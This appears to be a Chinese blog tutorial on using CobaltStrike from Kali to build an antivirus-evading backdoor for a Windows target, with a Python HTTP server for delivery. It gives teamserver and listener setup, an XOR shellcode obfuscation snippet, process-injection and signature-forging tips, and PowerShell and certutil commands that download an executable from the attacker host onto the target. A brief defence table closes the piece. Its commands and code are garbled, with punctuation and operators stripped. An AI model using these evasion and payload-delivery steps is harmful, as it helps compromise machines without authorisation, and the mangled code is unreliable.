Kali+Windows双系统实战:手把手教你用CobaltStrike生成免杀后门(附Python简易HTTP服务搭建)

发布时间:2026/5/18 0:49:04

Kali+Windows双系统实战:手把手教你用CobaltStrike生成免杀后门(附Python简易HTTP服务搭建) Kali与Windows双系统协作下的渗透测试实战从环境搭建到后门生成1. 环境准备与工具配置在开始渗透测试之前确保你已经准备好以下环境Kali Linux系统作为攻击平台建议使用最新版本2023.3或更高Windows目标机可以是物理机或虚拟机版本不限网络环境确保两台机器在同一局域网内能够互相通信1.1 Kali Linux基础配置首先更新Kali系统并安装必要工具sudo apt update sudo apt upgrade -y sudo apt install -y python3 python3-pip git openjdk-11-jdk验证Java版本CobaltStrike需要Java 8或11java -version1.2 CobaltStrike安装与启动CobaltStrike分为服务端TeamServer和客户端下载并解压CobaltStrike包启动TeamServer在Kali上执行chmod x teamserver ./teamserver Kali_IP 共享密码 [/path/to/c2.profile]提示建议使用非默认端口如50050并配置防火墙规则在Windows客户端连接启动cobaltstrike.bat输入Kali的IP、端口和共享密码2. 监听器创建与配置监听器是CobaltStrike与目标主机通信的桥梁。以下是创建HTTP监听器的步骤在CobaltStrike客户端导航到Cobalt StrikeListeners点击Add按钮配置以下参数参数值说明Namehttp-listener自定义名称Payloadwindows/beacon_http/reverse_httpHTTP反向连接HTTP HostKali的IP回调地址HTTP Port80或其他监听端口HTTP Host (Stager)同HTTP Host分阶段payload地址高级技巧使用DNS解析代替直接IP地址配置SSL证书启用HTTPS设置合法的User-Agent如浏览器常见UA3. 后门生成与免杀技术3.1 基础后门生成通过AttacksPackagesWindows Executable生成基础后门选择之前创建的监听器设置输出格式exe/dll/service配置以下免杀选项- **x64 vs x86**根据目标系统选择 - **Staged vs Stageless** - Staged分阶段文件小但需二次请求 - Stageless完整文件大但独立运行 - **模板注入**使用合法软件图标和版本信息3.2 高级免杀技巧方法一代码混淆# 示例简单的XOR加密shellcode import os def xor_encrypt(data, key): return bytes([b ^ key for b in data]) shellcode b\x90\x90\x90 # 你的shellcode encrypted xor_encrypt(shellcode, 0xAA)方法二进程注入使用Process Injection功能注入到explorer.exe等常见进程通过spawn as命令派生到新进程方法三签名伪造使用合法的代码签名证书需自行获取或修改PE头的证书信息不推荐4. 文件传输与Python HTTP服务当目标在内网时可通过简易HTTP服务传输文件4.1 Python3 HTTP服务在Kali上启动python3 -m http.server 8080 --directory /path/to/files在目标Windows执行下载# PowerShell下载 (New-Object Net.WebClient).DownloadFile(http://Kali_IP:8080/file.exe, C:\Windows\Temp\file.exe) # certutil下载Windows自带 certutil -urlcache -split -f http://Kali_IP:8080/file.exe C:\Windows\Temp\file.exe4.2 服务端与客户端对比方法优点缺点Python HTTP简单易用无加密日志明显SMB共享内网常用协议需要445端口开放FTP服务传输稳定需要额外配置DNS隧道隐蔽性高速度慢配置复杂5. 实战操作与问题排查5.1 典型工作流程生成免杀后门exe文件通过HTTP/SMB等方式传输到目标在目标执行后门在CobaltStrike查看上线主机进行后续渗透操作5.2 常见问题解决问题一后门无法上线检查监听器配置IP/端口是否正确验证网络连通性防火墙是否放行查看TeamServer日志./teamserver运行窗口问题二被杀毒软件拦截尝试不同的生成选项如使用PowerShell版本增加混淆强度使用进程注入等内存执行技术问题三HTTP服务无法访问检查Python服务是否正常启动验证Kali防火墙规则sudo ufw allow 8080/tcp sudo ufw status6. 安全建议与防御措施作为渗透测试者也应了解如何防御此类攻击防御矩阵攻击阶段防御措施初始访问禁用不必要的宏/脚本执行执行应用白名单限制PowerShell使用持久化监控注册表/启动项变更横向移动网络分段限制SMB访问命令控制出口流量监控检测异常连接增强检测部署EDR/XDR解决方案启用Windows Defender ATP配置SIEM规则如高频DNS请求告警7. 扩展学习与资源推荐实验环境使用VirtualBox/VMware创建隔离网络尝试不同Windows版本Win10/WinServer测试各种杀毒软件Defender/火绒/360进阶技术DNS Beacon配置Malleable C2 Profile定制与Metasploit框架联动红队基础设施搭建参考资源《Cobalt Strike权威指南》MITRE ATTCK矩阵红队技术博客如ired.team在实际操作中每个步骤都可能需要根据具体环境调整。建议先在测试环境中充分验证技术方案再应用于授权渗透测试项目。保持工具和技术的更新因为防御措施也在不断演进。

相关新闻